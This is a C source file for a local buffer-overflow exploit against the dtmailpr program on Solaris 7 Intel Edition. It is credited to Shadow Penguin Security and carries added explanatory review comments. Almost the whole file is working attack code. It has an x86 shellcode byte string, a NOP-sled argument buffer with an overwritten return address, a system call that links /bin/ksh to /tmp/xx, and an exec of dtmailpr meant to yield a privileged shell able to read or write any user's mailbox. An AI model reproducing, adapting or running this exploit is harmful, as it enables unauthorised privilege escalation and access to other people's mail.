- /*=============================================================================
- Solaris dtmailpr exploit for Solaris7 Intel Edition
- The Shadow Penguin Security (http://shadowpenguin.backsection.net)
- Written by UNYUN (shadowpenguin@backsection.net)
- Description:
- Local user can read/write any user's mailbox
- =============================================================================
- */
-
- #include <stdio.h>
-
- /* Layout constants for the argument buffer that main() builds. Review note:
-  * these offsets belong to the target named in the file header (dtmailpr on
-  * Solaris 7 Intel Edition); they are data for that one build, not tunables. */
- #define RETADR 1266   /* byte offset in buf where the 4 bytes of ip are stored (see main) */
- #define RETOFS 0x1d88 /* subtracted from the stack pointer returned by get_sp() to form ip */
- #define EXPADR 300    /* byte offset in buf at which exploit_code is copied */
- #define NOP 0x90      /* fill byte for the first MAXBUF bytes of buf */
- #define MAXBUF 2000   /* bytes filled; buf[MAXBUF-1] is set to the terminator */
-
- /* Return the current stack pointer.
-  * The result is whatever the inline asm leaves in %eax: there is no return
-  * statement in this non-void function, so the value depends on the compiler
-  * not touching %eax before returning (undefined behaviour by the standard;
-  * the original author relied on the de-facto i386 calling convention).
-  * The instruction names 32-bit registers, so this only captures a 32-bit
-  * stack pointer. Review note: compile with -Wreturn-type to see the gap. */
- unsigned long get_sp(void)
- {
- __asm__(" movl %esp,%eax ");
- }
-
- /* Machine-code payload as a byte string, ending with the path "/tmp/xx",
-  * which main() links to /bin/ksh before the run. The array is declared with
-  * 2000 elements but only the initialised prefix is used: main() copies
-  * strlen(exploit_code) bytes, so the payload must contain no 0x00 byte
-  * (none of the escapes below is \x00). Review note: the observable artefacts
-  * of a run are the /tmp/xx symlink and a very long "-f" argument to dtmailpr. */
- char exploit_code[2000] =
- "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
- "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
- "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
- "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
- "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
- "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
- "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
- "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
- "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
- "\x04\xe8\xc9\xff\xff\xff/tmp/xx";
-
- /* Build a 1999-byte "-f" argument and exec dtmailpr with it.
-  * Pre-C99 style: implicit-int main, and putenv/system/memset/strncpy/strlen/
-  * execl are used without prototypes (only <stdio.h> is included), which a
-  * modern compiler rejects without <stdlib.h>, <string.h> and <unistd.h>.
-  * Nothing is returned: on success execl() replaces the process, on failure
-  * control falls off the end without reporting the error. */
- main()
- {
- static char buf[MAXBUF+1000];   /* static storage, so bytes past MAXBUF start out zero */
- FILE *fp;                       /* unused */
- unsigned int i,ip,sp;           /* i is unused; ip and sp hold 32-bit addresses */
-
- putenv("LANG=");                /* set LANG to the empty string in the environment */
- sp=get_sp();                    /* stack pointer of this frame (see get_sp) */
- system("ln -s /bin/ksh /tmp/xx"); /* the path exploit_code ends with; exit status not checked, an existing /tmp/xx is left in place */
- printf("esp = 0x%x\n",sp);
- memset(buf,NOP,MAXBUF);         /* fill the first MAXBUF bytes with NOP */
- ip=sp-RETOFS;                   /* address derived from this process's stack pointer */
- printf("eip = 0x%x\n",ip);
- buf[RETADR ]=ip&0xff;           /* store ip at RETADR, least-significant byte first */
- buf[RETADR+1]=(ip>>8)&0xff;
- buf[RETADR+2]=(ip>>16)&0xff;
- buf[RETADR+3]=(ip>>24)&0xff;
- strncpy(buf+EXPADR,exploit_code,strlen(exploit_code)); /* copies exactly strlen bytes and no terminator, so the NOP fill after the payload is kept */
- buf[MAXBUF-1]=0;                /* terminator: the argument is MAXBUF-1 bytes long */
- execl("/usr/dt/bin/dtmailpr","dtmailpr","-f",buf,0); /* list sentinel passed as int 0 instead of (char *)0; only correct where int and pointer have the same width. Failure is not checked. */
- }
-
-